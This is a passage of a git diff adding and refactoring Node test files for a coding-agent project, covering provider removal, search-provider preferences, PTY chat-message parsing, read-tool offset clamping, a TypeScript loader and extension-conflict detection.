+    assert.match(source, /this\.onSetupAuth\(provider\.name\)/,
+      'onSetupAuth should be called with provider.name');
+  });
+
+  test('setup auth hint is shown', () => {
+    assert.match(source, /setup auth/,
+      'enter key hint should mention "setup auth"');
+  });
+});
diff --git a/src/tests/provider-manager-remove.test.ts b/src/tests/provider-manager-remove.test.ts
new file mode 100644
index 000000000..87ed9a144
--- /dev/null
+++ b/src/tests/provider-manager-remove.test.ts
@@ -0,0 +1,162 @@
+import test from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, readFileSync, rmSync } from "node:fs";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
+
+const { ModelsJsonWriter } = await import("../../packages/pi-coding-agent/src/core/models-json-writer.ts");
+const { ProviderManagerComponent } = await import(
+  "../../packages/pi-coding-agent/src/modes/interactive/components/provider-manager.ts"
+);
+const { initTheme } = await import(
+  "../../packages/pi-coding-agent/src/modes/interactive/theme/theme.ts"
+);
+
+initTheme();
+
+function createTempModelsJsonPath(): string {
+  const dir = mkdtempSync(join(tmpdir(), "provider-manager-test-"));
+  return join(dir, "models.json");
+}
+
+function readProviders(modelsJsonPath: string): string[] {
+  const config = JSON.parse(readFileSync(modelsJsonPath, "utf-8")) as {
+    providers?: Record<string, unknown>;
+  };
+  return Object.keys(config.providers ?? {}).sort();
+}
+
+function createComponent(options: {
+  modelsJsonPath: string;
+  authProviders?: string[];
+  providers: Array<{ name: string; modelIds: string[] }>;
+}) {
+  const writer = new ModelsJsonWriter(options.modelsJsonPath);
+  for (const provider of options.providers) {
+    writer.setProvider(provider.name, {
+      models: provider.modelIds.map((id: string) => ({ id })),
+    });
+  }
+
+  const authProviders = new Set(options.authProviders ?? []);
+  const removedProviders: string[] = [];
+  let refreshCalls = 0;
+  let renderCalls = 0;
+
+  const authStorage = {
+    hasAuth(provider: string) {
+      return authProviders.has(provider);
+    },
+    remove(provider: string) {
+      removedProviders.push(provider);
+      authProviders.delete(provider);
+    },
+  } as any;
+
+  const modelRegistry = {
+    modelsJsonPath: options.modelsJsonPath,
+    getAll() {
+      const config = JSON.parse(readFileSync(options.modelsJsonPath, "utf-8")) as {
+        providers?: Record<string, { models?: Array<{ id: string }> }>;
+      };
+      return Object.entries(config.providers ?? {}).flatMap(([provider, providerConfig]) =>
+        (providerConfig.models ?? []).map((model) => ({
+          id: model.id,
+          provider,
+        })),
+      );
+    },
+    refresh() {
+      refreshCalls += 1;
+    },
+  } as any;
+
+  const tui = {
+    requestRender() {
+      renderCalls += 1;
+    },
+  } as any;
+
+  const component = new ProviderManagerComponent(tui, authStorage, modelRegistry, () => {}, () => {});
+  return {
+    component,
+    removedProviders,
+    getRefreshCalls: () => refreshCalls,
+    getRenderCalls: () => renderCalls,
+  };
+}
+
+test("provider manager skips remove when provider has no auth", (t) => {
+  const modelsJsonPath = createTempModelsJsonPath();
+  const rootDir = join(modelsJsonPath, "..");
+  t.after(() => rmSync(rootDir, { recursive: true, force: true }));
+
+  const { component, removedProviders, getRefreshCalls, getRenderCalls } = createComponent({
+    modelsJsonPath,
+    providers: [{ name: "custom", modelIds: ["local-model"] }],
+  });
+
+  component.handleInput("r");
+
+  // No auth means remove is a no-op
+  assert.deepEqual(removedProviders, []);
+  assert.deepEqual(readProviders(modelsJsonPath), ["custom"]);
+  assert.equal(getRefreshCalls(), 0);
+  assert.equal(getRenderCalls(), 0);
+});
+
+test("provider manager removes provider models with confirmation when auth is stored", (t) => {
+  const modelsJsonPath = createTempModelsJsonPath();
+  const rootDir = join(modelsJsonPath, "..");
+  t.after(() => rmSync(rootDir, { recursive: true, force: true }));
+
+  const { component, removedProviders, getRefreshCalls, getRenderCalls } = createComponent({
+    modelsJsonPath,
+    authProviders: ["custom"],
+    providers: [{ name: "custom", modelIds: ["local-model"] }],
+  });
+
+  // First press enters confirmation mode
+  component.handleInput("r");
+  assert.deepEqual(removedProviders, []);
+  assert.equal((component as any).confirmingRemove, true);
+
+  // Second press confirms removal
+  component.handleInput("r");
+  assert.deepEqual(removedProviders, ["custom"]);
+  assert.deepEqual(readProviders(modelsJsonPath), []);
+  assert.equal(getRefreshCalls(), 1);
+  assert.ok(getRenderCalls() >= 2);
+  assert.ok(!(component as any).providers.some((provider: { name: string; modelCount: number }) =>
+    provider.name === "custom" || provider.modelCount > 0,
+  ));
+  assert.equal((component as any).selectedIndex, 0);
+});
+
+test("provider manager clamps selection after removing the selected provider", (t) => {
+  const modelsJsonPath = createTempModelsJsonPath();
+  const rootDir = join(modelsJsonPath, "..");
+  t.after(() => rmSync(rootDir, { recursive: true, force: true }));
+
+  const { component } = createComponent({
+    modelsJsonPath,
+    authProviders: ["zeta"],
+    providers: [
+      { name: "alpha", modelIds: ["a-1"] },
+      { name: "zeta", modelIds: ["z-1"] },
+    ],
+  });
+
+  (component as any).selectedIndex = (component as any).providers.findIndex(
+    (provider: { name: string }) => provider.name === "zeta",
+  );
+
+  // Double-press r to confirm removal
+  component.handleInput("r");
+  component.handleInput("r");
+
+  assert.deepEqual(readProviders(modelsJsonPath), ["alpha"]);
+  assert.ok(!(component as any).providers.some((provider: { name: string }) => provider.name === "zeta"));
+  assert.ok((component as any).selectedIndex >= 0);
+  assert.ok((component as any).selectedIndex < (component as any).providers.length);
+});
diff --git a/src/tests/provider.test.ts b/src/tests/provider.test.ts
index 85a7b99e8..8631aaf76 100644
--- a/src/tests/provider.test.ts
+++ b/src/tests/provider.test.ts
@@ -52,20 +52,18 @@ function makeTmpAuth(data: Record<string, unknown> = {}): { authPath: string; cl
 // 1. resolveSearchProvider — 8 scenarios
 // ═══════════════════════════════════════════════════════════════════════════
 
-test('resolveSearchProvider returns tavily when only TAVILY_API_KEY is set', async () => {
+test('resolveSearchProvider returns tavily when only TAVILY_API_KEY is set', async (t) => {
   const { resolveSearchProvider } = await import(
     '../resources/extensions/search-the-web/provider.ts'
   )
   const { authPath, cleanup } = makeTmpAuth()
-  try {
-    withEnv({ TAVILY_API_KEY: 'tvly-test', BRAVE_API_KEY: undefined }, () => {
-      // Override preference read to use our temp auth (auto)
-      const result = resolveSearchProvider('auto')
-      assert.equal(result, 'tavily')
-    })
-  } finally {
-    cleanup()
-  }
+  t.after(() => { cleanup() });
+
+  withEnv({ TAVILY_API_KEY: 'tvly-test', BRAVE_API_KEY: undefined }, () => {
+    // Override preference read to use our temp auth (auto)
+    const result = resolveSearchProvider('auto')
+    assert.equal(result, 'tavily')
+  })
 })
 
 test('resolveSearchProvider returns brave when only BRAVE_API_KEY is set', async () => {
@@ -148,69 +146,61 @@ test('resolveSearchProvider falls back to other provider when preferred key miss
 // 2. Preference get/set round-trip
 // ═══════════════════════════════════════════════════════════════════════════
 
-test('getSearchProviderPreference returns auto when no preference stored', async () => {
+test('getSearchProviderPreference returns auto when no preference stored', async (t) => {
   const { getSearchProviderPreference } = await import(
     '../resources/extensions/search-the-web/provider.ts'
   )
   const { authPath, cleanup } = makeTmpAuth()
-  try {
-    const pref = getSearchProviderPreference(authPath)
-    assert.equal(pref, 'auto')
-  } finally {
-    cleanup()
-  }
+  t.after(() => { cleanup() });
+
+  const pref = getSearchProviderPreference(authPath)
+  assert.equal(pref, 'auto')
 })
 
-test('getSearchProviderPreference reads from auth.json via AuthStorage', async () => {
+test('getSearchProviderPreference reads from auth.json via AuthStorage', async (t) => {
   const { getSearchProviderPreference } = await import(
     '../resources/extensions/search-the-web/provider.ts'
   )
   const { authPath, cleanup } = makeTmpAuth({
     search_provider: { type: 'api_key', key: 'tavily' },
   })
-  try {
-    const pref = getSearchProviderPreference(authPath)
-    assert.equal(pref, 'tavily')
-  } finally {
-    cleanup()
-  }
+  t.after(() => { cleanup() });
+
+  const pref = getSearchProviderPreference(authPath)
+  assert.equal(pref, 'tavily')
 })
 
-test('setSearchProviderPreference writes to auth.json via AuthStorage', async () => {
+test('setSearchProviderPreference writes to auth.json via AuthStorage', async (t) => {
   const { getSearchProviderPreference, setSearchProviderPreference } = await import(
     '../resources/extensions/search-the-web/provider.ts'
   )
   const { authPath, cleanup } = makeTmpAuth()
-  try {
-    setSearchProviderPreference('brave', authPath)
-    const pref = getSearchProviderPreference(authPath)
-    assert.equal(pref, 'brave')
+  t.after(() => { cleanup() });
 
-    // Round-trip: change to tavily
-    setSearchProviderPreference('tavily', authPath)
-    assert.equal(getSearchProviderPreference(authPath), 'tavily')
+  setSearchProviderPreference('brave', authPath)
+  const pref = getSearchProviderPreference(authPath)
+  assert.equal(pref, 'brave')
 
-    // Round-trip: change to auto
-    setSearchProviderPreference('auto', authPath)
-    assert.equal(getSearchProviderPreference(authPath), 'auto')
-  } finally {
-    cleanup()
-  }
+  // Round-trip: change to tavily
+  setSearchProviderPreference('tavily', authPath)
+  assert.equal(getSearchProviderPreference(authPath), 'tavily')
+
+  // Round-trip: change to auto
+  setSearchProviderPreference('auto', authPath)
+  assert.equal(getSearchProviderPreference(authPath), 'auto')
 })
 
-test('getSearchProviderPreference returns auto for invalid stored value', async () => {
+test('getSearchProviderPreference returns auto for invalid stored value', async (t) => {
   const { getSearchProviderPreference } = await import(
     '../resources/extensions/search-the-web/provider.ts'
   )
   const { authPath, cleanup } = makeTmpAuth({
     search_provider: { type: 'api_key', key: 'google' },
   })
-  try {
-    const pref = getSearchProviderPreference(authPath)
-    assert.equal(pref, 'auto', 'invalid stored value falls back to auto')
-  } finally {
-    cleanup()
-  }
+  t.after(() => { cleanup() });
+
+  const pref = getSearchProviderPreference(authPath)
+  assert.equal(pref, 'auto', 'invalid stored value falls back to auto')
 })
 
 // ═══════════════════════════════════════════════════════════════════════════
diff --git a/src/tests/pty-chat-parser.test.ts b/src/tests/pty-chat-parser.test.ts
index 5ed060fb0..07e21b63b 100644
--- a/src/tests/pty-chat-parser.test.ts
+++ b/src/tests/pty-chat-parser.test.ts
@@ -19,3 +19,131 @@ test("PtyChatParser.flush emits a trailing partial line without waiting for a ne
   assert.equal(latest[0]?.role, "assistant");
   assert.equal(latest[0]?.content, "All slices are complete — nothing to discuss.\n");
 });
+
+// ─── Bug #2707: User messages omitted ────────────────────────────────────────
+
+test("user input echoed on the same prompt line is classified as role=user", () => {
+  const parser = new PtyChatParser("test");
+  let latest = parser.getMessages();
+  parser.onMessage(() => {
+    latest = parser.getMessages();
+  });
+
+  // GSD prints assistant response, then prompt with user input on same line
+  parser.feed("Here is your task summary.\n");
+  parser.feed("❯ show status\n");
+
+  const userMsgs = latest.filter((m) => m.role === "user");
+  assert.equal(userMsgs.length, 1, "should have exactly one user message");
+  assert.equal(userMsgs[0].content, "show status");
+});
+
+test("user input on a separate line after bare prompt is classified as role=user, not assistant", () => {
+  const parser = new PtyChatParser("test");
+  let latest = parser.getMessages();
+  parser.onMessage(() => {
+    latest = parser.getMessages();
+  });
+
+  // GSD prints assistant text, then bare prompt on its own line
+  parser.feed("Done processing.\n");
+  parser.feed("❯ \n");
+  // User input appears on the next line (PTY echo without prompt prefix)
+  parser.feed("hello world\n");
+
+  const userMsgs = latest.filter((m) => m.role === "user");
+  assert.equal(userMsgs.length, 1, "should have exactly one user message");
+  assert.equal(userMsgs[0].content, "hello world");
+
+  // The user input must NOT appear as assistant content
+  const assistantMsgs = latest.filter((m) => m.role === "assistant");
+  for (const msg of assistantMsgs) {
+    assert.ok(
+      !msg.content.includes("hello world"),
+      "user input must not be misclassified as assistant content",
+    );
+  }
+});
+
+test("multiple user turns: each user input after prompt is role=user", () => {
+  const parser = new PtyChatParser("test");
+  let latest = parser.getMessages();
+  parser.onMessage(() => {
+    latest = parser.getMessages();
+  });
+
+  // Turn 1: assistant response, prompt, user input
+  parser.feed("Welcome to GSD.\n");
+  parser.feed("❯ \n");
+  parser.feed("discuss\n");
+
+  // Turn 2: assistant response, prompt, user input
+  parser.feed("Starting discussion mode.\n");
+  parser.feed("❯ \n");
+  parser.feed("plan my milestone\n");
+
+  const userMsgs = latest.filter((m) => m.role === "user");
+  assert.equal(userMsgs.length, 2, "should have two user messages");
+  assert.equal(userMsgs[0].content, "discuss");
+  assert.equal(userMsgs[1].content, "plan my milestone");
+});
+
+test("awaitingInput is true after prompt line, false after user input arrives", () => {
+  const parser = new PtyChatParser("test");
+
+  parser.feed("Task complete.\n");
+  assert.equal(parser.isAwaitingInput(), false, "not awaiting input before prompt");
+
+  parser.feed("❯ \n");
+  assert.equal(parser.isAwaitingInput(), true, "awaiting input after bare prompt");
+
+  parser.feed("next command\n");
+  assert.equal(parser.isAwaitingInput(), false, "no longer awaiting after user input");
+});
+
+test("awaitingInput resets when assistant content follows user input", () => {
+  const parser = new PtyChatParser("test");
+
+  parser.feed("Hello.\n");
+  parser.feed("❯ \n");
+  assert.equal(parser.isAwaitingInput(), true);
+
+  parser.feed("do something\n");
+  assert.equal(parser.isAwaitingInput(), false);
+
+  // Assistant responds
+  parser.feed("Working on it...\n");
+  assert.equal(parser.isAwaitingInput(), false, "should stay false during assistant output");
+});
+
+// ─── Bug #2707: Chat looks stuck ────────────────────────────────────────────
+
+test("prompt with empty user text does not create a user message but signals awaiting input", () => {
+  const parser = new PtyChatParser("test");
+  let latest = parser.getMessages();
+  parser.onMessage(() => {
+    latest = parser.getMessages();
+  });
+
+  parser.feed("All done.\n");
+  parser.feed("❯ \n");
+
+  const userMsgs = latest.filter((m) => m.role === "user");
+  assert.equal(userMsgs.length, 0, "bare prompt should not create a user message");
+  assert.equal(parser.isAwaitingInput(), true, "parser should signal awaiting input");
+});
+
+test("alternate prompt markers (› and >) also trigger awaiting input", () => {
+  const parser = new PtyChatParser("test");
+
+  parser.feed("Response text.\n");
+  parser.feed("› \n");
+  assert.equal(parser.isAwaitingInput(), true, "› prompt should trigger awaiting input");
+
+  parser.feed("user reply\n");
+  assert.equal(parser.isAwaitingInput(), false);
+
+  parser.feed("More output.\n");
+  parser.feed("> \n");
+  assert.equal(parser.isAwaitingInput(), true, "> prompt should trigger awaiting input");
+});
diff --git a/src/tests/read-tool-offset-clamp.test.ts b/src/tests/read-tool-offset-clamp.test.ts
new file mode 100644
index 000000000..4dc4c5e78
--- /dev/null
+++ b/src/tests/read-tool-offset-clamp.test.ts
@@ -0,0 +1,106 @@
+/**
+ * Tests for read tool offset clamping (#3007).
+ *
+ * When offset exceeds file length, the read tool should clamp to the
+ * last line instead of throwing, preventing downstream JSON parse errors
+ * in auto-mode milestone completion.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, writeFileSync, rmSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import { createReadTool } from "../../packages/pi-coding-agent/src/core/tools/read.ts";
+
+// ─── Helpers ─────────────────────────────────────────────────────────────────
+
+function makeTmpDir(): { dir: string; cleanup: () => void } {
+	const dir = mkdtempSync(join(tmpdir(), "read-tool-test-"));
+	return { dir, cleanup: () => rmSync(dir, { recursive: true, force: true }) };
+}
+
+function writeLines(dir: string, name: string, lineCount: number): string {
+	const lines = Array.from({ length: lineCount }, (_, i) => `Line ${i + 1}: content`);
+	const filePath = join(dir, name);
+	writeFileSync(filePath, lines.join("\n"));
+	return filePath;
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Offset beyond file bounds — should clamp, not throw (#3007)
+// ═══════════════════════════════════════════════════════════════════════════
+
+test("read tool: offset exceeding file length should NOT throw (#3007)", async (t) => {
+	const { dir, cleanup } = makeTmpDir();
+	t.after(cleanup);
+	writeLines(dir, "small-artifact.md", 13);
+
+	const readTool = createReadTool(dir);
+
+	// offset 30 on a 13-line file — exact reproduction of #3007
+	const result = await readTool.execute("test-call", {
+		path: "small-artifact.md",
+		offset: 30,
+	});
+
+	assert.ok(result, "should return a result, not throw");
+	assert.ok(result.content, "should have content");
+	assert.ok(result.content.length > 0, "should have at least one content block");
+
+	const text = (result.content[0] as any).text as string;
+	assert.ok(typeof text === "string", "first content block should be text");
+	// Should include the last line of the file (clamped)
+	assert.ok(text.includes("Line 13"), "should include last line of file after clamping");
+});
+
+test("read tool: offset 100 on a 5-line file clamps to last line", async (t) => {
+	const { dir, cleanup } = makeTmpDir();
+	t.after(cleanup);
+	writeLines(dir, "tiny-file.txt", 5);
+
+	const readTool = createReadTool(dir);
+	const result = await readTool.execute("test-call", {
+		path: "tiny-file.txt",
+		offset: 100,
+	});
+
+	const text = (result.content[0] as any).text as string;
+	assert.ok(text.includes("Line 5"), "should include the last line of the file");
+});
+
+test("read tool: offset at exact last line works normally", async (t) => {
+	const { dir, cleanup } = makeTmpDir();
+	t.after(cleanup);
+	writeLines(dir, "exact-offset.txt", 5);
+
+	const readTool = createReadTool(dir);
+	// offset 5 on a 5-line file — should return line 5 (valid, no clamping needed)
+	const result = await readTool.execute("test-call", {
+		path: "exact-offset.txt",
+		offset: 5,
+	});
+
+	const text = (result.content[0] as any).text as string;
+	assert.ok(text.includes("Line 5"), "should include line 5");
+});
+
+test("read tool: clamped offset includes notice about adjustment", async (t) => {
+	const { dir, cleanup } = makeTmpDir();
+	t.after(cleanup);
+	writeLines(dir, "notice-test.md", 10);
+
+	const readTool = createReadTool(dir);
+	const result = await readTool.execute("test-call", {
+		path: "notice-test.md",
+		offset: 50,
+	});
+
+	const text = (result.content[0] as any).text as string;
+	// Should contain some notice that the offset was adjusted
+	assert.ok(
+		text.includes("clamped") || text.includes("adjusted") || text.includes("beyond"),
+		`should indicate offset was clamped, got: ${text.slice(0, 200)}`,
+	);
+});
diff --git a/src/tests/resolve-ts-loader.test.ts b/src/tests/resolve-ts-loader.test.ts
new file mode 100644
index 000000000..6c81a6a32
--- /dev/null
+++ b/src/tests/resolve-ts-loader.test.ts
@@ -0,0 +1,50 @@
+import test from "node:test"
+import assert from "node:assert/strict"
+
+import { load as loadWithTestLoader, resolve as resolveWithTestLoader } from "../resources/extensions/gsd/tests/dist-redirect.mjs"
+
+const nextResolve = async (specifier: string) => ({ url: specifier })
+
+const cases = [
+  ["@gsd/pi-coding-agent", "../../packages/pi-coding-agent/src/index.ts"],
+] as const
+
+test("resolve-ts loader redirects pi-coding-agent bare imports to the workspace source entrypoint", async () => {
+  for (const [specifier, relativeTarget] of cases) {
+    const resolved = await resolveWithTestLoader(specifier, {}, nextResolve)
+    assert.equal(
+      resolved.url,
+      new URL(relativeTarget, import.meta.url).href,
+      `${specifier} should resolve to ${relativeTarget}`,
+    )
+  }
+})
+
+test("resolve-ts loader rewrites direct pi-coding-agent source entry import to .ts", async () => {
+  const resolved = await resolveWithTestLoader(
+    "../../packages/pi-coding-agent/src/index.js",
+    {},
+    nextResolve,
+  )
+
+  assert.equal(
+    resolved.url,
+    new URL("../../packages/pi-coding-agent/src/index.ts", import.meta.url).href,
+  )
+})
+
+test("resolve-ts loader transpiles pi-coding-agent source files that strip-only mode cannot parse", async () => {
+  const orchestratorUrl = new URL(
+    "../../packages/pi-coding-agent/src/core/compaction-orchestrator.ts",
+    import.meta.url,
+  ).href
+
+  const loaded = await loadWithTestLoader(orchestratorUrl, {}, async () => {
+    throw new Error("expected pi-coding-agent source to be transpiled before nextLoad")
+  })
+
+  assert.equal(loaded.format, "module")
+  assert.equal(loaded.shortCircuit, true)
+  assert.match(loaded.source, /constructor\(_deps\)/, "transpiled constructor should be valid JavaScript")
+  assert.doesNotMatch(loaded.source, /private readonly _deps/, "TypeScript parameter property syntax should be removed")
+})
diff --git a/src/tests/resource-loader-conflicts.test.ts b/src/tests/resource-loader-conflicts.test.ts
new file mode 100644
index 000000000..19d13973e
--- /dev/null
+++ b/src/tests/resource-loader-conflicts.test.ts
@@ -0,0 +1,235 @@
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+import { join, resolve, relative, sep } from "node:path";
+
+// ─── Inline the pure functions under test to avoid import-chain issues ───────
+// These are copied from packages/pi-coding-agent/src/core/resource-loader.ts
+// (detectExtensionConflicts + extractExtensionKey).  The test validates the
+// algorithm; integration coverage lives in the full build tests.
+
+interface MinimalExtension {
+  path: string;
+  tools: Map<string, unknown>;
+  commands: Map<string, unknown>;
+  flags: Map<string, unknown>;
+}
+
+function extractExtensionKey(ownerPath: string, extensionsDir: string): string | undefined {
+  const normalizedDir = resolve(extensionsDir);
+  const normalizedPath = resolve(ownerPath);
+  const prefix = normalizedDir.endsWith(sep) ? normalizedDir : `${normalizedDir}${sep}`;
+  if (!normalizedPath.startsWith(prefix)) {
+    return undefined;
+  }
+  const relPath = relative(normalizedDir, normalizedPath);
+  const firstSegment = relPath.split(/[\\/]/)[0];
+  return firstSegment?.replace(/\.(?:ts|js)$/, "") || undefined;
+}
+
+function detectExtensionConflicts(
+  extensions: MinimalExtension[],
+  bundledExtensionKeys: Set<string>,
+  extensionsDir: string,
+): Array<{ path: string; message: string }> {
+  const conflicts: Array<{ path: string; message: string }> = [];
+  const toolOwners = new Map<string, string>();
+  const commandOwners = new Map<string, string>();
+  const flagOwners = new Map<string, string>();
+
+  const isBundled = (ownerPath: string): boolean => {
+    const key = extractExtensionKey(ownerPath, extensionsDir);
+    return key !== undefined && bundledExtensionKeys.has(key);
+  };
+
+  for (const ext of extensions) {
+    for (const toolName of ext.tools.keys()) {
+      const existingOwner = toolOwners.get(toolName);
+      if (existingOwner && existingOwner !== ext.path) {
+        const hint = isBundled(existingOwner)
+          ? ` (built-in tool supersedes — consider removing ${ext.path})`
+          : "";
+        conflicts.push({ path: ext.path, message: `Tool "${toolName}" conflicts with ${existingOwner}${hint}` });
+      } else {
+        toolOwners.set(toolName, ext.path);
+      }
+    }
+
+    for (const commandName of ext.commands.keys()) {
+      const existingOwner = commandOwners.get(commandName);
+      if (existingOwner && existingOwner !== ext.path) {
+        const hint = isBundled(existingOwner)
+          ? ` (built-in command supersedes — consider removing ${ext.path})`
+          : "";
+        conflicts.push({ path: ext.path, message: `Command "/${commandName}" conflicts with ${existingOwner}${hint}` });
+      } else {
+        commandOwners.set(commandName, ext.path);
+      }
+    }
+
+    for (const flagName of ext.flags.keys()) {
+      const existingOwner = flagOwners.get(flagName);
+      if (existingOwner && existingOwner !== ext.path) {
+        conflicts.push({ path: ext.path, message: `Flag "--${flagName}" conflicts with ${existingOwner}` });
+      } else {
+        flagOwners.set(flagName, ext.path);
+      }
+    }
+  }
+
+  return conflicts;
+}
+
+// ─── helpers ──────────────────────────────────────────────────────────────────
+
+function makeExtension(
+  path: string,
+  overrides: { tools?: string[]; commands?: string[]; flags?: string[] } = {},
+): MinimalExtension {
+  const tools = new Map<string, unknown>();
+  for (const name of overrides.tools ?? []) tools.set(name, {});
+  const commands = new Map<string, unknown>();
+  for (const name of overrides.commands ?? []) commands.set(name, {});
+  const flags = new Map<string, unknown>();
+  for (const name of overrides.flags ?? []) flags.set(name, {});
+  return { path, tools, commands, flags };
+}
+
+// ─── extractExtensionKey ─────────────────────────────────────────────────────
+
+describe("extractExtensionKey", () => {
+  const extensionsDir = "/home/user/.gsd/agent/extensions";
+
+  it("extracts directory name from a nested extension path", () => {
+    assert.equal(
+      extractExtensionKey("/home/user/.gsd/agent/extensions/mcp-client/index.js", extensionsDir),
+      "mcp-client",
+    );
+  });
+
+  it("strips .ts/.js suffix from flat extension files", () => {
+    assert.equal(
+      extractExtensionKey("/home/user/.gsd/agent/extensions/my-ext.ts", extensionsDir),
+      "my-ext",
+    );
+  });
+
+  it("returns undefined when the path is not under extensionsDir", () => {
+    assert.equal(
+      extractExtensionKey("/other/path/some-ext/index.js", extensionsDir),
+      undefined,
+    );
+  });
+});
+
+// ─── detectExtensionConflicts ─────────────────────────────────────────────────
+
+describe("detectExtensionConflicts", () => {
+  const extensionsDir = "/home/user/.gsd/agent/extensions";
+
+  it("returns no conflicts when extensions have unique tool names", () => {
+    const extensions = [
+      makeExtension(join(extensionsDir, "ext-a/index.js"), { tools: ["tool_a"] }),
+      makeExtension(join(extensionsDir, "ext-b/index.js"), { tools: ["tool_b"] }),
+    ];
+    const conflicts = detectExtensionConflicts(extensions, new Set(["ext-a"]), extensionsDir);
+    assert.equal(conflicts.length, 0);
+  });
+
+  it("adds supersedes hint when first-registered tool owner is a bundled extension", () => {
+    const bundledPath = join(extensionsDir, "mcp-client/index.js");
+    const userPath = join(extensionsDir, "mcporter/index.ts");
+
+    const extensions = [
+      makeExtension(bundledPath, { tools: ["mcp_servers"] }),
+      makeExtension(userPath, { tools: ["mcp_servers"] }),
+    ];
+
+    const conflicts = detectExtensionConflicts(extensions, new Set(["mcp-client"]), extensionsDir);
+
+    assert.equal(conflicts.length, 1);
+    assert.ok(
+      conflicts[0].message.includes("supersedes"),
+      `Expected "supersedes" in message, got: ${conflicts[0].message}`,
+    );
+    assert.equal(conflicts[0].path, userPath);
+  });
+
+  it("omits supersedes hint when first-registered tool owner is NOT bundled", () => {
+    const userPathA = join(extensionsDir, "mcporter/index.ts");
+    const userPathB = join(extensionsDir, "mcporter-v2/index.ts");
+
+    const extensions = [
+      makeExtension(userPathA, { tools: ["mcp_servers"] }),
+      makeExtension(userPathB, { tools: ["mcp_servers"] }),
+    ];
+
+    const conflicts = detectExtensionConflicts(extensions, new Set(["mcp-client"]), extensionsDir);
+
+    assert.equal(conflicts.length, 1);
+    assert.ok(
+      !conflicts[0].message.includes("supersedes"),
+      `Expected no "supersedes" in message, got: ${conflicts[0].message}`,
+    );
+  });
+
+  it("adds supersedes hint for command conflicts with bundled extensions", () => {
+    const bundledPath = join(extensionsDir, "mcp-client/index.js");
+    const userPath = join(extensionsDir, "mcporter/index.ts");
+
+    const extensions = [
+      makeExtension(bundledPath, { commands: ["mcp"] }),
+      makeExtension(userPath, { commands: ["mcp"] }),
+    ];
+
+    const conflicts = detectExtensionConflicts(extensions, new Set(["mcp-client"]), extensionsDir);
+
+    assert.equal(conflicts.length, 1);
+    assert.ok(
+      conflicts[0].message.includes("supersedes"),
+      `Expected "supersedes" in command conflict, got: ${conflicts[0].message}`,
+    );
+  });
+
+  it("works with an empty bundledExtensionKeys set (backwards compat)", () => {
+    const pathA = join(extensionsDir, "ext-a/index.js");
+    const pathB = join(extensionsDir, "ext-b/index.js");
+
+    const extensions = [
+      makeExtension(pathA, { tools: ["shared_tool"] }),
+      makeExtension(pathB, { tools: ["shared_tool"] }),
+    ];
+
+    const conflicts = detectExtensionConflicts(extensions, new Set(), extensionsDir);
+
+    assert.equal(conflicts.length, 1);
+    assert.ok(
+      !conflicts[0].message.includes("supersedes"),
+      `Expected no "supersedes" when bundledKeys empty, got: ${conflicts[0].message}`,
+    );
+  });
+
+  it("reproduces issue #2075: bundled extension under /.gsd/agent/extensions/ was never identified as built-in", () => {
+    // Before the fix, the isBuiltIn check used path heuristics that excluded
+    // paths containing /.gsd/agent/extensions/, so bundled extensions placed
+    // there by initResources() could never be recognized as built-in.
+    const bundledPath = "/home/user/.gsd/agent/extensions/mcp-client/index.js";
+    const userPath = "/home/user/.gsd/agent/extensions/mcporter/index.ts";
+
+    const extensions = [
+      makeExtension(bundledPath, { tools: ["mcp_servers", "mcp_discover", "mcp_call"] }),
+      makeExtension(userPath, { tools: ["mcp_servers", "mcp_discover", "mcp_call"] }),
+    ];
+
+    const bundledKeys = new Set(["mcp-client"]);
+    const conflicts = detectExtensionConflicts(extensions, bundledKeys, "/home/user/.gsd/agent/extensions");
+
+    // All three conflicting tools should include the supersedes hint
+    assert.equal(conflicts.length, 3);
+    for (const conflict of conflicts) {
+      assert.ok(
+        conflict.message.includes("supersedes"),
+        `Conflict for tool should include "supersedes" hint, got: ${conflict.message}`,
+      );
+    }
+  });
+});
diff --git a/src/tests/resource-loader.test.ts b/src/tests/resource-loader.test.ts
index 77437e3ab..06dd615c5 100644
--- a/src/tests/resource-loader.test.ts
+++ b/src/tests/resource-loader.test.ts
@@ -1,6 +1,6 @@
 import test from "node:test";
 import assert from "node:assert/strict";
-import { existsSync, mkdirSync, mkdtempSync, rmSync, writeFileSync } from "node:fs";
+import { existsSync, mkdirSync, mkdtempSync, readFileSync, rmSync, writeFileSync } from "node:fs";
 import { join, parse } from "node:path";
 import { tmpdir } from "node:os";
 
@@ -49,84 +49,179 @@ test("getExtensionKey normalizes top-level .ts and .js entry names to the same k
   );
 });
 
-test("hasStaleCompiledExtensionSiblings only flags top-level .ts/.js sibling pairs", async () => {
+test("hasStaleCompiledExtensionSiblings only flags top-level .ts/.js sibling pairs", async (t) => {
   const { hasStaleCompiledExtensionSiblings } = await import("../resource-loader.ts");
   const tmp = mkdtempSync(join(tmpdir(), "gsd-resource-loader-"));
   const extensionsDir = join(tmp, "extensions");
+  const bundledDir = join(tmp, "bundled");
 
-  try {
-    mkdirSync(join(extensionsDir, "gsd"), { recursive: true });
-    writeFileSync(join(extensionsDir, "gsd", "index.ts"), "export {};\n");
-    assert.equal(hasStaleCompiledExtensionSiblings(extensionsDir), false);
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }); });
 
-    writeFileSync(join(extensionsDir, "ask-user-questions.js"), "export {};\n");
-    assert.equal(hasStaleCompiledExtensionSiblings(extensionsDir), false);
+  mkdirSync(bundledDir, { recursive: true });
+  mkdirSync(join(extensionsDir, "gsd"), { recursive: true });
+  writeFileSync(join(extensionsDir, "gsd", "index.ts"), "export {};\n");
+  assert.equal(hasStaleCompiledExtensionSiblings(extensionsDir, bundledDir), false);
 
-    writeFileSync(join(extensionsDir, "ask-user-questions.ts"), "export {};\n");
-    assert.equal(hasStaleCompiledExtensionSiblings(extensionsDir), true);
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  writeFileSync(join(bundledDir, "ask-user-questions.js"), "export {};\n");
+  writeFileSync(join(extensionsDir, "ask-user-questions.js"), "export {};\n");
+  assert.equal(hasStaleCompiledExtensionSiblings(extensionsDir, bundledDir), false);
+
+  writeFileSync(join(extensionsDir, "ask-user-questions.ts"), "export {};\n");
+  assert.equal(hasStaleCompiledExtensionSiblings(extensionsDir, bundledDir), true);
